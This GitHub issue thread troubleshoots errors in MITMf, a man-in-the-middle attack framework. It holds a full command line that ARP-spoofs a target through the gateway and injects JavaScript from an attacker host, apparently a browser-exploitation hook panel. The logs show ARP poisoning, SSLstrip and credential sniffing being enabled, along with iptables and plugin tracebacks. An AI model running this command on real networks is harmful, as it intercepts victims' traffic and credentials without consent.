### ISSUE TITLE
error starting mitmf

### ISSUE THREAD

**Issue by necony286** [byt3bl33d3r/MITMf#282]
using kali rolling 2016.1 
# python mitmf.py -i wlan0 --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.2 --inject --js-url http://192.168.1.8:3000/ui/panel
                                                    
 __  __   ___   .--.          __  __   ___              
|  |/  `.'   `. |__|         |  |/  `.'   `.      _.._  
|   .-.  .-.   '.--.     .|  |   .-.  .-.   '   .' .._| 
|  |  |  |  |  ||  |   .' |_ |  |  |  |  |  |   | '     
|  |  |  |  |  ||  | .'     ||  |  |  |  |  | __| |__   
|  |  |  |  |  ||  |'--.  .-'|  |  |  |  |  ||__   __|  
|  |  |  |  |  ||  |   |  |  |  |  |  |  |  |   | |     
|__|  |__|  |__||__|   |  |  |__|  |__|  |__|   | |     
                       |  '.'                   | |     
                       |   /                    | |     
                       `'-'                     |_|

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
modprobe: ERROR: could not insert 'ip_tables': Exec format error
iptables v1.6.0: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
|_ HTTP server online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online

^C

2016-03-10 22:09:19 [ARPpoisoner] Restoring connection 192.168.1.2 <-> 192.168.1.1 with 2 packets per host
modprobe: ERROR: could not insert 'ip_tables': Exec format error
iptables v1.6.0: can't initialize iptables table `filter': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.

**Comment by necony286** [comment]
2016-03-10 22:31:11 MITMf started: ['mitmf.py', '-i', 'wlan0', '--spoof', '--arp', '--gateway', '192.168.1.1', '--target', '192.168.1.2', '--inject', '--js-url', 'http://192.168.1.8:3000/ui/panel', '--log-level', 'debug']
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
2016-03-10 22:31:11 [ProxyPlugins] Adding Inject plugin
|_ Inject v0.4
2016-03-10 22:31:11 [ProxyPlugins] Adding Spoof plugin
|_ Spoof v0.6
2016-03-10 22:31:11 [ARPpoisoner] gatewayip  => 192.168.1.1
2016-03-10 22:31:11 [ARPpoisoner] gatewaymac => cc:a2:23:5c:fd:f1
2016-03-10 22:31:11 [ARPpoisoner] targets    => [IPAddress('192.168.1.2')]
2016-03-10 22:31:11 [ARPpoisoner] ignore     => []
2016-03-10 22:31:11 [ARPpoisoner] ip         => 192.168.1.8
2016-03-10 22:31:11 [ARPpoisoner] mac        => 74:e5:43:4a:c9:ec
2016-03-10 22:31:11 [ARPpoisoner] interface  => wlan0
2016-03-10 22:31:11 [ARPpoisoner] arpmode    => rep
2016-03-10 22:31:11 [ARPpoisoner] interval   => 3
2016-03-10 22:31:11 [Utils] Setting ip forwarding to 1
2016-03-10 22:31:11 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
modprobe: ERROR: could not insert 'ip_tables': Exec format error
iptables v1.6.0: can't initialize iptables table `nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

**Comment by byt3bl33d3r** [comment]
Are you running MITMf as root? if not you have kernel issues

**Comment by horllste** [comment]
Hello, am having a similar issue and i dont want to create another issue

  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-23 18:38:55 192.168.8.102 [type:Firefox-44 os:Windows 7] download.cdn.mozilla.net
2016-06-23 18:38:56 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
2016-06-23 18:39:59 192.168.8.102 [type:Firefox-44 os:Windows 7] download.cdn.mozilla.net
2016-06-23 18:40:01 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'
